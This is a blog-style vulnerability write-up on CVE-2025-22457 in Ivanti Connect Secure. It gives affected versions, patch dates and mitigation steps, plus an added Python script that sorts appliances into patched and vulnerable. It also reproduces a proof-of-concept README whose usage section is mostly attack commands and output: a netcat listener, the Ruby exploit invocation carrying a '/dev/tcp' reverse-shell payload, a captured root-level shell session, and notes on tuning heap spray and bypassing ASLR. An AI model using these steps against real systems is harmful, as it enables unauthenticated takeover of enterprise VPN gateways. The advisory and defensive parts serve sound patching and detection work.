Ivanti Connect Secure Buffer Overflow Vulnerability

Vulnerability information

Vulnerability name: Ivanti Connect Secure buffer overflow vulnerability

Vulnerability ID:

  • CVE: CVE-2025-22457

Vulnerability type: Buffer overflow

Severity: Critical

Vulnerability description:

Affected products

Ivanti Connect Secure is a widely used enterprise-grade secure connectivity solution, primarily used to provide secure remote access services. It is typically deployed in enterprise environments to protect employees' remote access. Ivanti Policy Secure and Ivanti ZTA Gateways are also Ivanti security products, providing policy enforcement and gateway services for zero-trust architectures. Pulse Connect Secure is a similar product but has reached end of support (EoS). These products are widely deployed in enterprises, so the impact of this vulnerability is broad.

Vulnerability explanation

This is a critical stack-based buffer overflow. Its technical root cause is that, when processing certain input, the length of that input is not properly validated, allowing an attacker to overwrite critical data on the stack and execute arbitrary code. Vulnerabilities of this kind are typically caused by missing strict bounds checks on user-supplied input.

Impact analysis

This vulnerability allows an unauthenticated attacker to execute code remotely, meaning an attacker can take full control of an affected system without any user interaction or authentication. Because of its severity and ease of exploitation, it has already been exploited in the wild by several espionage groups (suspected to be China-linked), using malware including TRAILBLAZE (dropper), BRUSHFIRE (backdoor) and the SPAWN malware ecosystem. Exploitation can lead to data theft, service disruption, and use of the compromised appliance as a pivot for further attacks. Since exploitation requires no authentication and can be automated, the risk is extremely high.

Vendor: Ivanti

Product name: Ivanti Connect Secure, Ivanti Policy Secure, Ivanti ZTA Gateways, Pulse Connect Secure

Affected versions: Ivanti Connect Secure (≤ 22.7R2.5), Ivanti Policy Secure (≤ 22.7R1.3), Ivanti ZTA Gateways (≤ 22.8R2), Pulse Connect Secure (≤ 9.1R18.9, EoS)

Source: https://github.com/B1ack4sh/Blackash-CVE-2025-22457

Type: CVE-2025:github search

Repository files

  • README.md

Source overview

CVE-2025-22457: Critical Ivanti Connect Secure Vulnerability ⚡

⚠️ CVE-2025-22457 Overview

🛡️ Type: Critical stack-based buffer overflow
💻 Affected Products:

  • Ivanti Connect Secure (≤ 22.7R2.5)
  • Ivanti Policy Secure (≤ 22.7R1.3)
  • Ivanti ZTA Gateways (≤ 22.8R2)
  • Pulse Connect Secure (≤ 9.1R18.9, EoS)

🔥 Impact: Remote unauthenticated code execution


📅 Patch Release Dates

| 🛠️ Product | 📦 Fixed Version | 📆 Release Date |
|---|---|---|
| Ivanti Connect Secure | 22.7R2.6 | Feb 2025 |
| Ivanti Policy Secure | 22.7R1.4 | April 21, 2025 |
| Ivanti ZTA Gateways | 22.8R2.2 | April 19, 2025 |
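As an added example for defenders (not part of the PoC repository or of Ivanti's tooling), the following Python script encodes the affected and fixed releases from the tables above so an appliance inventory can be triaged. It parses Ivanti's marketing version format (`22.7R2.5`, `22.8R2`), classifies each device as patched, vulnerable, or unknown (a version that falls between the last listed affected release and the first fix, or a Pulse Connect Secure build newer than the last listed affected one, is reported as unknown rather than guessed), and flags the end-of-support product as needing migration. The function names and the sample inventory at the bottom are constructed for illustration.

```python
"""Triage Ivanti appliance versions against the CVE-2025-22457 advisory data.

Added example for asset-inventory triage; not part of the PoC repository.
The version ranges come from the advisory tables above; function names and the
sample inventory are constructed for illustration.
"""
import re
from typing import Dict, List, Optional, Tuple

# Last affected and first fixed release per product, from the advisory tables.
# Pulse Connect Secure is end-of-support (EoS), so no fixed release exists.
ADVISORY: Dict[str, Dict[str, Optional[str]]] = {
    "Ivanti Connect Secure": {"max_affected": "22.7R2.5", "fixed": "22.7R2.6"},
    "Ivanti Policy Secure":  {"max_affected": "22.7R1.3", "fixed": "22.7R1.4"},
    "Ivanti ZTA Gateways":   {"max_affected": "22.8R2",   "fixed": "22.8R2.2"},
    "Pulse Connect Secure":  {"max_affected": "9.1R18.9", "fixed": None},
}

# Marketing version format: <major>.<minor>R<release>[.<patch>], e.g. 22.7R2.5 or 22.8R2.
# The build string printed by the PoC ("22.7.2.3597") is a different format and is
# deliberately rejected so it cannot be silently misread as a marketing version.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$", re.IGNORECASE)


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """'22.7R2.5' -> (22, 7, 2, 5); a missing patch field counts as 0, so '22.8R2' -> (22, 8, 2, 0)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = m.groups()
    return int(major), int(minor), int(release), int(patch or 0)


def assess(product: str, version: str) -> Dict[str, str]:
    """Classify one (product, version) pair as patched, vulnerable or unknown."""
    if product not in ADVISORY:
        raise KeyError(f"product not covered by this advisory: {product!r}")
    entry = ADVISORY[product]
    v = parse_version(version)
    last_affected = parse_version(entry["max_affected"])
    fixed = parse_version(entry["fixed"]) if entry["fixed"] else None
    result = {"product": product, "version": version}

    if fixed is not None and v >= fixed:
        result.update(status="patched",
                      reason=f"at or above the fixed release {entry['fixed']}")
    elif v <= last_affected:
        action = (f"upgrade to {entry['fixed']} or later" if fixed
                  else "no fix exists (end of support); migrate off this product")
        result.update(status="vulnerable",
                      reason=f"at or below the last affected release {entry['max_affected']}; {action}")
    else:
        # Newer than the last listed affected release but not a listed fix:
        # the advisory data does not say, so report it instead of guessing.
        result.update(status="unknown",
                      reason=f"newer than {entry['max_affected']} but not a listed fixed release; "
                             "confirm against the vendor advisory")
    return result


def triage(inventory: List[Tuple[str, str, str]]) -> Dict[str, list]:
    """Run assess() over (hostname, product, version) rows and group results by status."""
    grouped: Dict[str, list] = {"vulnerable": [], "unknown": [], "patched": []}
    for host, product, version in inventory:
        r = assess(product, version)
        grouped[r["status"]].append((host, r))
    return grouped


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and versions are made up for the demo.
    SAMPLE = [
        ("vpn-01", "Ivanti Connect Secure", "22.7R2.4"),
        ("vpn-02", "Ivanti Connect Secure", "22.7R2.6"),
        ("nac-01", "Ivanti Policy Secure",  "22.7R1.3"),
        ("zta-01", "Ivanti ZTA Gateways",   "22.8R2.1"),
        ("legacy", "Pulse Connect Secure",  "9.1R18.9"),
    ]
    for status, hosts in triage(SAMPLE).items():
        for host, r in hosts:
            print(f"{status:10s} {host:8s} {r['product']} {r['version']}: {r['reason']}")
```

The comparison is done on parsed tuples rather than on strings so that `22.7R2.10` sorts after `22.7R2.9`. Versions the tables do not cover are reported as `unknown` on purpose; a triage script that guessed in that gap would hide exactly the appliances that most need a manual check. The build string the PoC prints is not a marketing version and is rejected by `parse_version` rather than compared.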

🚨 Exploitation in the Wild

  • 🕵️‍♂️ Active since mid-March 2025
  • 🎯 Targeted by espionage groups (suspected China-linked)
  • 💀 Uses malware: TRAILBLAZE (dropper), BRUSHFIRE (backdoor), SPAWN malware ecosystem

✅ Mitigation Steps

  1. ⬆️ Update affected systems immediately
  2. 🔍 Detect compromises with Integrity Checker Tool (ICT)
  3. 🕵️‍♀️ Investigate and isolate suspected systems
  4. 🔑 Reset certificates, keys, and passwords
  5. 📊 Monitor logs for unusual activity continuously

🚨 Usage:

We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4 as follows:

Start a netcat listener to catch the reverse shell.

sudo ncat -lnvkp 8080

Run the exploit and brute force ASLR (This will be slow).

sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering..

When it works you will get a reverse shell.

sudo ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$

📡 Debug:

Web Child Processes:

Depending on the underlying hardware, the number of CPUs available to the target appliance dictates how many child processes the /home/bin/web binary spawns. Because incoming HTTPS requests are distributed evenly between these children, the heap spray has to be performed enough times to reach every child process: when the vulnerability is triggered there is no way to know which child process will handle the request, so the spray must be present in all of them.

  • 1 vCPU - 1 web process, no children
  • 2 vCPU - 1 web parent, 2 children
  • 4 vCPU - 1 web parent, 4 children (This is the default, and corresponds to the Ivanti Connect Secure ISA4000-V platform)
  • 8 vCPU - 1 web parent, 8 children (This corresponds to the Ivanti Connect Secure ISA6000-V platform)

For example, in a rooted vulnerable appliance, run the following to see the number of child /home/bin/web processes:

bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S 104 3012 2394 0 80 0 - 26313 - ? 00:00:00 web
4 S 104 3013 2394 0 80 0 - 24931 - ? 00:00:00 web80
1 S 104 4947 3012 2 80 0 - 28209 - ? 00:01:27 web
1 S 104 5217 3012 1 80 0 - 31527 - ? 00:00:49 web
1 S 104 5695 3012 0 80 0 - 28199 - ? 00:00:00 web
1 S 104 5715 3012 0 80 0 - 28199 - ? 00:00:00 web
bash-4.2#

You can specify the expected number of web children via the --web_children argument, for example:

sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4

libdsplibs Base Address

If you are testing the PoC on a local system, you may want to avoid brute-forcing the libdsplibs base address. In this scenario, you can pass a known base address to the PoC via the --libdsplibs argument. For example, in a rooted vulnerable appliance, run the following:

bash-4.2# ps -A| grep web
ps -A| grep web
3200 ? 00:00:01 web80
20536 ? 00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879 /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879 /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879 /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879 /home/lib/libdsplibs.so
bash-4.2#

Then you can pass the known base address to the PoC as follows:

sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering...

⚠️ Disclaimer:

The information provided here is for educational and awareness purposes only. Always follow your organization’s security policies and procedures when applying patches or performing security assessments. Unauthorized exploitation or scanning of systems without permission is illegal and unethical. Stay responsible and secure! 🛡️🔒


http://example.com/2025/07/13/github_874970738/
Author: lianccc
Published: July 13, 2025